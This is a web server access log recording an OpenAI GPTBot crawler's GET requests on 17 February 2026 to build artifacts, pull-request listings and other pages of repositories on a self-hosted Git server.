"/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:19:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14833] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:19:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:19:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11243] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554574] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554530] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh?display=source" [Client 74.7.227.38] [Length 14764] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:19:53:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13154] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492836] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492043] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492048] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474069] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474061] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492842] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 31876] [Gzip 12.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:19:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 21635] [Gzip 10.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 14128] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15239] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:53:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554573] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2findex-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 28462] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2findex-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 28464] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492012] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 